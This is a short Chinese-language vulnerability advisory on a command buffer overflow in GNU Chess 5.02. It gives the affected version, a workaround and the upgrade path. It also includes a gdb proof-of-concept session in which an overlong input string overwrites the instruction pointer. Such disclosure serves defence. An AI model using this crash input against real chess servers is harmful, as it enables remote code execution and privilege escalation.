GNU Chess 命令存在缓冲溢出漏洞发布时间:2002-01-28 更新时间:2002-01-28 严重程度:中 威胁程度:权限提升 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:3949 受影响系统 GNU Chess 5.02详细描述 GNU Chess 是一款免费开放源代码的象棋引擎。 GNU Chess 没有充分检查命令的缓冲边界。攻击者可以通过接口远程发送命令产生缓冲溢出。 测试代码 ---------------------------------------------------- bernhard@bb:/usr/src/gnuchess$ gdb ./gnuchess (gdb) run Starting program: /usr/src/gnuchess/./gnuchess GNU Chess v5.02 Transposition table: Entries=1024K Size=32768K Pawn hash table: Entries=384K Size=18432K White (1) : AAAAAAAAAAAAAAA1234567890 Program received signal SIGSEGV, Segmentation fault. 0x35343332 in ?? () ----------------------------------------------------- 解决方案 临时解决方法: 如果网络接口已经安装,请正确配置来限制对CHESS命令的访问。 升级相关程序: GNU Chess 5.02: GNU Upgrade chess-5.03beta.tar.gz ftp://ftp.gnu.org/pub/gnu/chess/chess-5.03beta.tar.gz 相关信息 Bernhard Kuemel <darsie@gmx.at> 参考:http://www.securityfocus.com/archive/1/252148 相关主页:http://www.gnu.org/software/chess/chess.html |
